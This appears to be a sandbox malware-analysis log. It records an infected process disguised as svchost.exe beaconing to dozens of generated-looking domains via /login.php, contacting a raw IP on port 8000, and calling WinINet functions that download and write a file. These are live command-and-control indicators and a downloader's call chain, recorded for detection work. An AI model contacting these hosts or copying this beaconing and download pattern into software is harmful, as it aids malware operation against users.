    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478891988923922560
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC4AB0 memset,GetProcessHeap,HeapAlloc,memset,memcpy,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_02BC4AB0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0433-1952-9852-0a12b0cc4551 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0433-1952-8ae5-52e851fd8a3a HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731346399.2937263
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
